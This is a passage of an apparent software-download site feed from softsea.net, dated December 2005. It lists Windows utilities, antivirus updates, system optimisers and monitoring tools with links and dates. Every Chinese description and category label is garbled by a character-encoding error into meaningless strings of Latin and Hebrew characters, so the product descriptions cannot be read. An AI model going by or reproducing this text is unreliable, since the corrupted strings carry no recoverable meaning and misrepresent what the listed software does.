/>3£÷¶װ´°ּו£¨°ְ¨°´ֵ¥¡¢ֱ׀±ם¿ע¡¢±ךּגְ¹µָװ×ֻ״£©½ר׀׀ׂ‏²״ֿװ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30514.htm">ֿµֽ³¼א¿״</a>] - -http://www.softsea.net/soft/126114.htm -Mon, 26 Dec 2005 16:00:00 GMT - - -Search and Replace ÷÷»¯°ז 5.3 -http://www.softsea.net/soft/106692.htm - -<img src="http://www.softsea.net/shot1/106692.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¸צ¹¦ִַ¿´ףµִֻׁׁ°׃כּז´ת¹₪¾¡£ֻ¿ֹׂװװֽ¬ׂ»²¿׃²ֵּײ׀¶װֻש׃׀µִ־ִ¼‏½ר׀׀ֻׁׁ°׃כ ּז»»µִ¹¦ִ£¬ׂ²¿ֹׂװ¶װ Zip ־ִ¼‏ײ׀µִ־ִ¼‏׳צֻׁׁ°£¬ײ§³ײּ״ג׳ײ·ּץ¼‏±ם´ן½ֻׁׁ°£¬»עַ ׂװ½ֵ±¾־ִ¼‏(Script)׳צֻׁׁ°ּז»»¹₪׳ק£¬ׂ²¿ֹׂװׂװ¶‏½רײֶµִ±ם¾·½½׳צֻׁׁ°ּז»»¡£¶רֻׁׁ°µ½ µִ־ִ¼‏ׂ²¿ֹׂװױכ¶װִָ¡¢פ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30203.htm">²יױּׂז»»</a>] - -http://www.softsea.net/soft/106692.htm -Mon, 26 Dec 2005 16:00:00 GMT - - -ִ¾ֲם¿ֻ׀ַ ¼עּוײ׀־ִ 5.50 Build 1229 -http://www.softsea.net/soft/136699.htm - -<img src="http://www.softsea.net/shot1/136699.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;²ֹ׃ֳ´¿¶¯ּ¬¼א׃ֽרֲחֱ¬½׃¼¼ץ£¬¿ֹׂװ׃׀׀§²יֹ±ִ¿ַ°¾ר´ף¶א‎÷¿ֽ³ּ׀ע<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31190.htm">ִ¾ֲם¼ל²ג</a>] - -http://www.softsea.net/soft/136699.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -xpy 0.9.4 -http://www.softsea.net/soft/136586.htm - -<img src="http://www.softsea.net/shot1/136586.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ֳ¿µ±ִד°²׳°ֽךׂ»¸צ׀ֲµִֿµֽ³,´עֽך·±¶אµִSP÷ֽHotfixׂװ÷ףײ´׀׀ׂ»ֲֿxpyַׂ»¸צ·ַ³£¡ֲµִײקׂג:)xpyױג¸צ׀¡¹₪¾¼¸÷ץ¼¯³ֱֹֻֻש׃׀־ֳַׂ׀טׂ×ײ¶¯ָ¥׳צµִWindows XPֹטײֳ,ְ‎ָח¹״±ױ־׃ֳ¶ֻ¿µָ,¸ש¾²»ֽ¬µִֹטײֳ»¹׃׀׀ם¶אִ£½¿ֹ¹©ׁ¡װס,±ָָחXP AntiSpyּב¹©׳מ´ףµִ±£»₪,µָµָµָµָ...<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30305.htm">ֿµֽ³׃ֵ»¯</a>] - -http://www.softsea.net/soft/136586.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -E-ֹס¼׃ֳ־ִ¼‏¼׀ Build 051226 -http://www.softsea.net/soft/136584.htm - -<img src="http://www.softsea.net/shot1/136584.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;E-ֹס¼׃ֳ־ִ¼‏¼׀ַׂ»¿מ¹¦ִֽךֶֹ£¬½חֳז÷ְ»×£¬²׳ק¼ע±דµִ־ִ¼‏¼׀¼׃ֳָם¼‏£¬¹׃ֳ±¾ָם¼‏ִת¿ֹׂװַבׂ׳µ״½«ִתµִֻ½ָֻ׳ֱֿµֿײ¼׃ֳ±£´ז£¬¼ע±דµ½ײ»ׂ×װִתֿכׂ×¼׃ֳµִ־ִ¼‏¼׀ֽ¼±ךֹֿ׃ׂ¼µ¥»ק[E-ֹס¼׃ֳ]£¬ָ»÷ףהָכױ‎ָ·µֲֳִכװ°´ׂ»ֲֿ»״³µ¾ֽ¿ֹׂװֱֻ£¡±¾ָם¼‏²ֹ׃ֳ³ֹלµִRSAֻד·¨£¬ֳִָתµֳִ״ֳ¸ֳ״ֳ£¡<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30216.htm">־ִ¼‏¼׃ֳ</a>] - -http://www.softsea.net/soft/136584.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -System Surveillance Pro 3.7 -http://www.softsea.net/soft/135846.htm - -<img src="http://www.softsea.net/shot1/135846.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼ֲַ¼¼ֵּהָכ¡¢³ּ׀עװֻ׀׀¡¢ֽרױ¾·ֳ־÷ֽ¼´±׀ֵֿ¢¡£ֽ¨¹‎µח׳׃׃¼‏·¢ֻֽ¾¯±¨÷ֽ‎¾׃ֳ׃װ¶³ּה¯ְְ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/304.htm">°²ָ«·ְ»₪</a> > <a href="http://www.softsea.net/cat/30409.htm">ֿµֽ³¼א׃</a>] - -http://www.softsea.net/soft/135846.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -Total Uninstall ÷÷»¯°ז 3.52 -http://www.softsea.net/soft/133774.htm - -<img src="http://www.softsea.net/shot1/133774.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Total Uninstallִ°ןִד¼א׃ָם¼‏°²׳°µִֻש׃׀¹‎³ּ£¬¼ֲַ¼ֲֻֿ¶װֿµֽ³ֻש׳צµִָ־÷־¸ִ±ה£¬±ָָח£÷ּם¼׃µִ־ִ¼‏¡¢¶װ׳¢²ב±ם÷ֽֿµֽ³־ִ¼‏µִ׀¸ִ£¬²¢ײֶ׳ק³ֹ°²׳°ַ°÷ֽ°²׳°÷ףµִ¿לױױ¡£׀¶װ״ָם¼‏±£¬²»׀טׂ×¹׃ֳ׀¶װ״³ּ׀ע£¬ײ±½׃ֽ¨¹‎¸ֳָם¼‏±ד¿ֹ½«ֶהֽךָ«µ״ַו³‎³צֿµֽ³£¬²»ֱפֲָֿ־÷־÷¼£¡£´׃¶ר±£ײ₪ֱֻ ֿµֽ³µִ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30304.htm">׀¶װ״¹₪¾</a>] - -http://www.softsea.net/soft/133774.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -Total Uninstall 3.52 -http://www.softsea.net/soft/133727.htm - -<img src="http://www.softsea.net/shot1/133727.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Total Uninstallִ°ןִד¼א׃ָם¼‏°²׳°µִֻש׃׀¹‎³ּ£¬¼ֲַ¼ֲֻֿ¶װֿµֽ³ֻש׳צµִָ־÷־¸ִ±ה£¬±ָָח£÷ּם¼׃µִ־ִ¼‏¡¢¶װ׳¢²ב±ם÷ֽֿµֽ³־ִ¼‏µִ׀¸ִ£¬²¢ײֶ׳ק³ֹ°²׳°ַ°÷ֽ°²׳°÷ףµִ¿לױױ¡£׀¶װ״ָם¼‏±£¬²»׀טׂ×¹׃ֳ׀¶װ״³ּ׀ע£¬ײ±½׃ֽ¨¹‎¸ֳָם¼‏±ד¿ֹ½«ֶהֽךָ«µ״ַו³‎³צֿµֽ³£¬²»ֱפֲָֿ־÷־÷¼£¡£´׃¶ר±£ײ₪ֱֻ ֿµֽ³µִ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30304.htm">׀¶װ״¹₪¾</a>] - -http://www.softsea.net/soft/133727.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -SwiftDog RamSmash 1.12.26.2005 -http://www.softsea.net/soft/133725.htm - -<img src="http://www.softsea.net/shot1/133725.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;´ֻ¹₪¾¿ֹֽ·ִֵ´זµְִֻ·ׁ²¿·ײְ´ּב¸¼ֶֻד»תֿµֽ³µִ׀װִ¡£׃µ׃׀¸¶אµִִ´ז£¬¼ֶֻד»ת½«»בװֻ׀׀¸¿ל¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30301.htm">ִ´ז׃ֵ»¯</a>] - -http://www.softsea.net/soft/133725.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -PGWARE GameBoost 1.12.26.2005 -http://www.softsea.net/soft/133215.htm - -<img src="http://www.softsea.net/shot1/133215.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;GameBoost¿ֹׂװ¸ִ±הִדµִֿµֽ³ֹטײֳ£¬´׃¶רװצ¼׃׃־ֿ·÷ֽֽרֲחֻ¶ָ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30305.htm">ֿµֽ³׃ֵ»¯</a>] - -http://www.softsea.net/soft/133215.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -ײ׀־ֲִִכ׳×»»¾½³ 3.1 -http://www.softsea.net/soft/132997.htm - -<img src="http://www.softsea.net/shot1/132997.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ײ׀־ֲִִכ׳×»»¾½³²ֹ׃ֳGBK׃כBIG5ֲכ׳×»»£¬׃כ³£¼µִGB׃כBIG5µִ׳×»»³ּ׀ע²»ֽ¬¡£GBKֲכ¸²¸ֱַֻGB׃כBIG5ָ«²¿׳ײ·£¬ׂע´ֻ³¹µ׳½ג¾צֱֻ³£¼µִGBֲכ׃כBIG5ֲכ׳×»»³ּ׀ע´זװµִ´׃BIG5ֲכ׳×»»־×GBֲכ±´זװµִָ±׳ײ¡¢ֲ©׳ײ¡¢ֲֲׂכֿײֿף£¬½ג¾צֱֻ׃ֳGBKֲכהָכµִװBIG5ֲכ·¶־§ִµִ׳ײ·ֿעBIG5ױ‎³£׳×»»µִ־ּג¡£ֻ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/310.htm">ײ׀־ִֿµֽ³</a> > <a href="http://www.softsea.net/cat/31003.htm">ֲִכ׳×»»</a>] - -http://www.softsea.net/soft/132997.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -PGWARE GameGain 2.12.26.2005 -http://www.softsea.net/soft/126108.htm - -<img src="http://www.softsea.net/shot1/126108.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ִדַ·ס¾ץµֳִדµִµחִװ׃־ֿ·װֻ׀׀»÷ֲ‎£¬»­ֳז²»¼ׁ£¿GameGain ¿ֹׂװֽ¨¹‎׃ֵ»¯ֿµֽ³ֹטײֳ´׃¶ר½ג¾צױג׀©־ּג£¬¾ֻֽדִדµִµחִװֵהײֳ½ֿµֽ£¬GameGainׂ²ֳִָµחִװ׃־ֿ·װֻ׀׀ֱק³©£¬±םֿײ³צֹ«¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30390.htm">ֶהֻ¹₪¾</a>] - -http://www.softsea.net/soft/126108.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -־ִ¼‏¼׃ֻרֽץ 2005 7.100 -http://www.softsea.net/soft/126099.htm - -<img src="http://www.softsea.net/shot1/126099.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ִ¿ַ°¹״׃־ִ¼‏»ע־ִ¼‏¼׀¼׃ֳµִָם¼‏ֲֵ¼²»ֿ£¬ױג׀©ָם¼‏ׂ»°ד¶¼ַֽ¨¹‎׀¸ִ׳¢²ב±ם£¨ָח׀¸ִ־ִ¼‏¹״ֱס¢׃ֳֿµֽ³¼¶ֽ¼±ך־±׳°ִ¿ֲ¼µָ£©ְ´µֿײ£¬ױג¶װ׃²ִֻס¼¶µִ׃ֳ»§µ¹ַ¿ֹ׀׀£¬ָח¹׃צµ½¸ײµִ»°ִַױזµִ׃׀µד²»¿°ׂ»»קֱֵֻ¶¡£»¹׃׀¾ַֽֿײװµִֶֶ½גָם¼‏÷¶א£¬ֻהָ»־×Word¡¢Excel¡¢Wpsµָ־ִµµֹטײֱֲֳֳֻכ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30216.htm">־ִ¼‏¼׃ֳ</a>] - -http://www.softsea.net/soft/126099.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Vet Engine Version Full for Windows 9x/ME 12.4.2017 -http://www.softsea.net/soft/110509.htm - -<img src="http://www.softsea.net/shot1/110509.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼עׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110509.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Vet Engine Version for Windows NT/2000 12.4.2017 -http://www.softsea.net/soft/110508.htm - -<img src="http://www.softsea.net/shot1/110508.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110508.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Vet Engine Version update for Windows 9x/ME from 12.4.2013 to 12.4.2017 -http://www.softsea.net/soft/110507.htm - -<img src="http://www.softsea.net/shot1/110507.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼עׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110507.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Vet Engine Version update for Windows NT/2000 from 12.4.2013 to 12.4.2017 -http://www.softsea.net/soft/110506.htm - -<img src="http://www.softsea.net/shot1/110506.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼עׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110506.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -¼ֵּ־ו±ֱ·ֿ°³ּ׀ע 6.15 -http://www.softsea.net/soft/110033.htm - -<img src="http://www.softsea.net/shot1/110033.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;±¾ָם¼‏־×¼ֱֵּ·ֿ°¼°ׁ§ֿ°־ו±׳ײ׀ֽײ®׃ֳ£¬÷ֿ׃µחִװ³ץׁ§ױ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/310.htm">ײ׀־ִֿµֽ³</a> > <a href="http://www.softsea.net/cat/31004.htm">־ו±הָכ·¨</a>] - -http://www.softsea.net/soft/110033.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -PGWARE PCBoost 3.12.26.2005 -http://www.softsea.net/soft/108471.htm - -<img src="http://www.softsea.net/shot1/108471.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;PCBoost¿ֹׂװ׃ֵ»¯ִתµִµחִװ.¹ֶה´ןµ½׳מ¸׀װִµִ׳´ּ¬.¼עׂ׳µִµקױ·½·¨.¼´±ַ׀¡÷¢ׂ²ִַבׂ׳׃ֵ»¯PC´ןµ½׳מ¼ׁ׳´ּ¬.ײ»׀טף±ךµד»ק.<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30502.htm">ױן²ג¹₪¾</a>] - -http://www.softsea.net/soft/108471.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -PGWARE PCMedik 6.12.26.2005 -http://www.softsea.net/soft/107816.htm - -<img src="http://www.softsea.net/shot1/107816.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¿ֹׂװ׃ֵ»¯ִדµִµחִװ£¬ֳָPC·¢»׃¸´ףµִ׀װִ£¬´ף´ף¼ץְֹֻ»תµֲִ¼‏¡£ִדײ»׀כׁ¡װס²׳קֿµֽ³µְִא׀ֽ÷ֽCPUֳ׳ײ£¬װµד»ק[GO]°´ֵ¥¾ֽ»בֽך³ָֹ«²¿µִ׃׀׃ֵ»¯ֹט¶¨£¡<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30305.htm">ֿµֽ³׃ֵ»¯</a>] - -http://www.softsea.net/soft/107816.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -ֽךְֳ׀¶װ״ XP 20.00 Build 1226 -http://www.softsea.net/soft/107790.htm - -<img src="http://www.softsea.net/shot1/107790.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;װצ¼׃ֱֻ¶װײ§³ײIE5ָם¼‏µִַ¶ָכ½²׳ק£¬׀¶װ״±½«ׂ»²¢׀¶װ״µפ£¬ָח³¬¼¶½ג°װµָָם¼‏£»׀ױ‎ֱֹֻ‎ָם¼‏׀¶װ״÷ף²»ִ»¹װ­־ִ¼‏´ע¿×·½½µִ²׳ק£¬ָחACDSEE£»׀ױ‎ֱֻ²»ִ׀¶װ״²¡¶¾·ְ»נַ½µִ´ם־ף£»׀ױ‎ֶהֻׂ»׀©׀¡´ם־ף£¬°·ײ°¼זָֹֿ´ת°ז±¾¡£²ֹ׃ֳ¸ָֿ½רµִ¿לֻֻד·¨£¬ָם¼‏¼א׃°²׳°¸¼׃ָ«ֳז׳¼±¸¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30304.htm">׀¶װ״¹₪¾</a>] - -http://www.softsea.net/soft/107790.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -PGWARE SuperRam 5.12.26.2005 -http://www.softsea.net/soft/107553.htm - -<img src="http://www.softsea.net/shot1/107553.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¿מִ´ז־¬»₪¹ְםָם¼‏£¬ִד¼עײ±¸׀¾ץ²»µ½ֻµִ´זװ£¬µ«ֻµִָ·־×ִד׳צֱֻ÷¶א£¡£¡װ¹׃ֳ±£¬ִדײ»ׂ×¼עµ¥µִׁ¡װסׂ»¸צ׀טׂ×ֽ·ֵµִִ´זֱ¿£¬װµד»ק¡°ok¡±¼´¿ֹ¸רִדµִµחִװֱמָֻ¾×ׂלµִ׀§¹¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30301.htm">ִ´ז׃ֵ»¯</a>] - -http://www.softsea.net/soft/107553.htm -Sun, 25 Dec 2005 16:00:00 GMT - - -AnyView ֽרֲח¾¯ 3.44 -http://www.softsea.net/soft/133737.htm - -<img src="http://www.softsea.net/shot1/133737.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ַׂ»¿מֶףׂµ¼¶µִֽרֲח¼א¿״ָם¼‏¡£ׂ»»ת°²׳°¼´¿ֹ¼א¿״¡¢¼ֲַ¼¡¢¿״ײֶ¾ײ׃עֽרִֶהֻ¼ֶֻד»תµִֹֽֿר׀׀־ס£׃ֳ׃·ְײ¹µ¥־»ײ״ׂ×׳ֱֿ»תֳ־ִ¼‏µָµִ׀¹ֳ£»¼א¶½ֹף²יֿײֶֽרֲח¹׃ֳ׀׀־×£»±¸·ײ״ׂ×ֽרֲח׳װ´־ִ¼‏¡£ײקׂ×¹¦ִ׃׀£÷<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30514.htm">ֿµֽ³¼א¿״</a>] - -http://www.softsea.net/soft/133737.htm -Sat, 24 Dec 2005 16:00:00 GMT - - -MultiRes 1.55 -http://www.softsea.net/soft/109094.htm - -<img src="http://www.softsea.net/shot1/109094.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;´תּזWindows µִ·ײ±זֲµקױµִ÷ֳµִׁ¡װס£¬׀¡ַֹµ׃ֳ£¬ײ±½׃ֹטײֳֻ¢׀ֲֲ£¬·ײ±זֲµקױ÷ףּב־£¬ױגׁש¾ֽ²»»בװ³צ ֿײ»¨ֱֶ±־¼ֶ¿ֹ©ֱֻ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/306.htm">½חֳז¹₪¾</a> > <a href="http://www.softsea.net/cat/30602.htm">׳ְֳז¹₪¾</a>] - -http://www.softsea.net/soft/109094.htm -Fri, 23 Dec 2005 16:00:00 GMT - - -xStarter 1.72 -http://www.softsea.net/soft/136848.htm - -<img src="http://www.softsea.net/shot1/136848.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;½«ִ³׀©³£¹ז¼ֶֻד»ת²׳ק׳װ¶¯»¯½ר׀׀־×ִ¿µִµִ³ּ׀ע<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30506.htm">׳װ¶¯¹״»ת</a>] - -http://www.softsea.net/soft/136848.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -PECompact 2.69d -http://www.softsea.net/soft/109730.htm - -<img src="http://www.softsea.net/shot1/109730.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¸צִׁ¹ֻץ¿ֹײ´׀׀־ִ¼‏µִ¹₪¾£¬ֽ¨¹‎ׁ¹ֻץ´תֲכ¡¢‎¾¡¢ֿא¹״׳װ´¹ׁ¹ֻץִ´ןµ½100%£¬ ׃ֹ׃װװֻ׀׀±²»׀טׂ×»ײ¸´´ֵֵֹּֿׁ¹ֻץ÷ףµִ‎¾£¬ֻשׂװ׃כֳ»׃׀ׁ¹ֻץµִ³ּ׀עװװֻ׀׀±ֳ»׃׀ֳקֿװµִֻ¶ָ²מׂל£¬ װִ³ײײ³ּ¶ָֹֿ»¹׃׀ֻש¸ִֶֹ¡£ <br /><br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/308.htm">¿×·¢ײֶ׳ק</a> > <a href="http://www.softsea.net/cat/30806.htm">ָם¼‏´ע°</a>] - -http://www.softsea.net/soft/109730.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -WinRescue XP 1.08.32 -http://www.softsea.net/soft/109022.htm - -<img src="http://www.softsea.net/shot1/109022.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±ִדµִ Windows XP²׳קֿµֽ³·¢ֹת־ּג־·¨¿×»ת£¬ֱ¬°²ָ«ִ£½ ׂ²׃׀־ּג±£¬´ף²¿·ײµִָֻ¿ִֹ»בׁ¡װסײ״¹א׳קׂµֿµֽ³ׂ»ֽ¾£¬»ע׀ם ִד¿ֹׂװװװױג¸צָם¼‏£¬ֻ¿ֹ°ןִדװֶ½±ֲָֿ±¸·Windows NT µִ½ב¹¹ֵהײֳֿא¹״־ִ¼‏ (°ְ¨autoexec.bat¡¢config.sys¡¢msdos.sys¡¢ Registryµֲַ¼µµ¡¢Start Menu¡¢׳ְ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/109022.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -WinRescue NT 2.08.32 -http://www.softsea.net/soft/109021.htm - -<img src="http://www.softsea.net/shot1/109021.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±ִדµִ Windows NT ²׳קֿµֽ³·¢ֹת־ּג־·¨¿×»ת£¬ֱ¬°²ָ«ִ£½ ׂ²׃׀־ּג±£¬´ף²¿·ײµִָֻ¿ִֹ»בׁ¡װסײ״¹א׳קׂµֿµֽ³ׂ»ֽ¾£¬»ע׀ם ִד¿ֹׂװװװױג¸צָם¼‏£¬ֻ¿ֹ°ןִדװֶ½±ֲָֿ±¸·Windows NT µִ½ב¹¹ֵהײֳֿא¹״־ִ¼‏ (°ְ¨ autoexec.bat¡¢config.sys¡¢msdos.sys¡¢ Registryµֲַ¼µµ¡¢Start Menu¡¢<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/109021.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -WinRescue ME 1.08.32 -http://www.softsea.net/soft/109020.htm - -<img src="http://www.softsea.net/shot1/109020.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±ִדµִ WinRescue Millennium ²׳קֿµֽ³·¢ֹת־ּג־·¨¿×»ת£¬ֱ¬°²ָ«ִ£½ ׂ²׃׀־ּג±£¬´ף²¿·ײµִָֻ¿ִֹ»בׁ¡װסײ״¹א׳קׂµֿµֽ³ׂ»ֽ¾£¬»ע׀ם 